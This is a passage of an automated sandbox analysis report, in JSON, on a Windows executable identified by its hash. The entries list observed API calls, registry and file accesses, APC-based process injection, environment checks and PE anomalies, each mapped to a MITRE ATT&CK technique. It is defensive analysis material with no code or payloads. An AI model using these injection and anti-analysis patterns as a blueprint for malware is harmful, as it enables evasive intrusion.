\"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter CreateFileMappingW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter MapViewOfFile (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00006088)\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExA (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4b276@RPCRT4.dll\"\n \"15001600c03e3c6b@ADVAPI32.dll\"\n \"0e000f00703f3c6b@ADVAPI32.dll\"\n \"0e000f00cc3f3c6b@ADVAPI32.dll\"\n \"11001200b4473c6b@ADVAPI32.dll\"\n \"1100120048483c6b@ADVAPI32.dll\"\n \"120013008c483c6b@ADVAPI32.dll\"\n \"12001300e4483c6b@ADVAPI32.dll\"\n \"14001500dc6f3c6b@ADVAPI32.dll\"\n \"14001500f46f3c6b@ADVAPI32.dll\"\n \"140015000c703c6b@ADVAPI32.dll\"\n \"1700180024703c6b@ADVAPI32.dll\"\n \"0d000e003c703c6b@ADVAPI32.dll\"\n \"110012004c703c6b@ADVAPI32.dll\"\n \"1100120060703c6b@ADVAPI32.dll\"\n \"0d000e0034493c6b@SHELL32.dll\"\n \"0d000e00b0493c6b@SHELL32.dll\"\n \"0f001000a0713c6b@ADVAPI32.dll\"\n \"14001500e0713c6b@ADVAPI32.dll\"\n \"14001500f8713c6b@ADVAPI32.dll\"\n \"0c000d0040723c6b@ADVAPI32.dll\"\n \"0c000d0050723c6b@ADVAPI32.dll\"\n \"0e000f0060723c6b@ADVAPI32.dll\"\n \"0e000f0070723c6b@ADVAPI32.dll\"\n \"0b000c0080723c6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\DBGHELP.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"NtQueueApcThread\" (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe.Local\\\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\COMCTL32.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to touch file \"C:\\7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe.Local\\\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" trying to access non-existent file \"C:\\7E2ADC1E8273C9662CC51304835805CC31D1A65C5B151789B69E5441CB666465.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6DE80000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"IsWow64Process\" with parameter \"6088\" - (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has resource with unusual entropy \"GLC:7.858546211487421\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has a section named \".gfids\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"FlsAlloc\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"GetActiveWindow\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: USER32.DLL)\n Found string \"GetDateFormatEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNEL32.DLL)\n Found string \"GetEnabledXStateFeatures\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNEL32.DLL)\n Found string \"GetLastActivePopup\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: USER32.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"GetProcessWindowStation\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: USER32.DLL)\n Found string \"GetTimeFormatEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNEL32.DLL)\n Found string \"GetUserDefaultLocaleName\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"GetUserObjectInformationW\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: USER32.DLL)\n Found string \"GetXStateFeaturesMask\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNEL32.DLL)\n Found string \"IsValidLocaleName\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"LCIDToLocaleName\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"LocaleNameToLCID\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)\n Found string \"LocateXStateFeature\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNEL32.DLL)\n Found string \"MessageBoxW\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: USER32.DLL)\n Found string \"SetThreadStackGuarantee\" (Source: 7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-98", "relevance": 5, "name": "PE files contains large number of export functions (more than 100)", "description": "7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465 contains more than 100 export function", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", 